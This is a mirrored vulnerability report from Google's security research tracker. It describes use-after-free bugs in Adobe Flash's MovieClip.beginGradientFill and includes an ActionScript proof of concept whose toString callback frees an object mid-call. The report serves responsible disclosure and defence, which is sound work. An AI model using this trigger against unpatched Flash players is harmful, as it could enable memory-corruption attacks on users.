search

cipherpunk / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-frees in GradientFill #557

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago 
There are a number of use-after-free vulnerabilities in 
MovieClip.beginGradientFill. If the spreadMethod or any other string parameter 
is an object with toString defined, this method can free the MovieClip, which 
is then used. Note that many parameters to this function can be used to execute 
script and free the MovieClip during execution, it is recommended that this 
issues be fixed with a stale pointer check. 

A PoC is as follows:

this.createEmptyMovieClip("bmp_fill_mc", 1);
with (bmp_fill_mc) {

     colors = [0xFF0000, 0x0000FF];
    fillType = "radial"
    alphas = [100, 100];
    ratios = [0, 0xFF];
    var o = {toString: func};
    spreadMethod = o;
    interpolationMethod = "linearRGB";
    focalPointRatio = 0.9;
    matrix = new Matrix();
    matrix.createGradientBox(100, 100, Math.PI, 0, 0);
    beginGradientFill(fillType, colors, alphas, ratios, matrix, 
        spreadMethod, interpolationMethod, focalPointRatio);
    moveTo(100, 100);
    lineTo(100, 300);
    lineTo(300, 300);
    lineTo(300, 100);
    lineTo(100, 100);
    endFill();
}

bmp_fill_mc._xscale = 200;
bmp_fill_mc._yscale = 200;

function func(){

    trace("in func");
    var test = thiz.createTextField("test", 1, 1, 1, 10, 10);
    trace(test);
    test.removeTextField();
    return "reflect";
    }

A sample swf and fla is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 7 Oct 2015 at 10:17

Attachments:

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 9 Oct 2015 at 6:15

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 6 Nov 2015 at 7:05

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 17 Dec 2015 at 7:13